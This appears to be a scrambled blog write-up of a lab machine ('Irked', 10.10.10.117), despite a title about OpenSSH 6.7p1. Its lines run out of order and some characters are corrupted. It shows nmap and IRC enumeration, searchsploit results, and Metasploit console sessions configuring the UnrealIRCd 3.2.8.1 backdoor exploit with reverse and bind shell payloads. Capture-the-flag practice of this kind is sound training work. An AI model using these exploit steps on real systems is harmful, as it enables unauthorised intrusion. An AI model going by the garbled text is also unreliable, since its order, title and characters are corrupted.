Openssh 6.7p1 exploit3/22/2023 LHOST yes The listen address (an interface may be specified) Msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse Exploit completed, but no session was created. Msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run 10.10.10.117:65534 - Exploit failed: An exploitation error occurred. RHOSTS 10.10.10.117 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' Msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): Msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > use 5 Msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads Compatible PayloadsĠ cmd/unix/bind_perl manual No Unix Command Shell, Bind TCP (via Perl)ġ cmd/unix/bind_perl_ipv6 manual No Unix Command Shell, Bind TCP (via perl) IPv6Ģ cmd/unix/bind_ruby manual No Unix Command Shell, Bind TCP (via Ruby)ģ cmd/unix/bind_ruby_ipv6 manual No Unix Command Shell, Bind TCP (via Ruby) IPv6Ĥ cmd/unix/generic manual No Unix Command, Generic Command Executionĥ cmd/unix/reverse manual No Unix Command Shell, Double Reverse TCP (telnet)Ħ cmd/unix/reverse_bash_telnet_ssl manual No Unix Command Shell, Reverse TCP SSL (telnet)ħ cmd/unix/reverse_perl manual No Unix Command Shell, Reverse TCP (via Perl)Ĩ cmd/unix/reverse_perl_ssl manual No Unix Command Shell, Reverse TCP SSL (via perl)ĩ cmd/unix/reverse_ruby manual No Unix Command Shell, Reverse TCP (via Ruby)ġ0 cmd/unix/reverse_ruby_ssl manual No Unix Command Shell, Reverse TCP SSL (via Ruby)ġ1 cmd/unix/reverse_ssl_double_telnet manual No Unix Command Shell, Double Reverse TCP SSL (telnet) Msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 65534 RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' Name Current Setting Required Description Msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > options Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): # Name Disclosure Date Rank Check DescriptionĠ exploit/unix/irc/unreal_ircd_3281_backdoor excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands. UnrealIRCd 3.x - Remote Denial of Service | windows/dos/ UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | linux/remote/ UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | windows/dos/18011.txt UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb MAXTARGETS=20 are supported by this serverġ7:18 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnetĬASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT are supported by this serverġ7:18 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this serverġ7:18 -!- There are 1 users and 0 invisible on 1 serversġ7:18 -!- Mode change for user rootĪccording to this, we have a UnrealIRC version 3.2.8.1 $ sudo irssi 10.10.10.117 65534 Irssi v1.2.2-1+b1 - ġ7:18 -!- Irssi: The following settings were initializedġ7:18 -!- Irssi: Connecting to 10.10.10.117 port 65534ġ7:18 -!- Irssi: Connection to 10.10.10.117 establishedġ7:18 !irked.htb *** Looking up your hostname.ġ7:18 !irked.htb *** Couldn't resolve your hostname using your IP address insteadġ7:18 -!- Welcome to the ROXnet IRC Network -!- Your host is irked.htb, running version Unreal3.2.8.1ġ7:18 -!- This server was created Mon at 13:12:50 EDTġ7:18 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjġ7:18 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 65534/tcp open irc UnrealIRCd (Admin email we have an IRC in this box let’s start trying to connect to it.Nmap done: 1 IP address (1 host up) scanned in 65.04 secondsĪccording to Nmap’s results, we have open these ports related to UrealIRCd: |_http-title: Site doesn't have a title (text/html).Ħ5534/tcp open irc UnrealIRCd (Admin email Info: Host: irked.htb OS: Linux CPE: cpe:/o:linux:linux_kernel |_http-server-header: Apache/2.4.10 (Debian)
0 Comments
Leave a Reply.AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |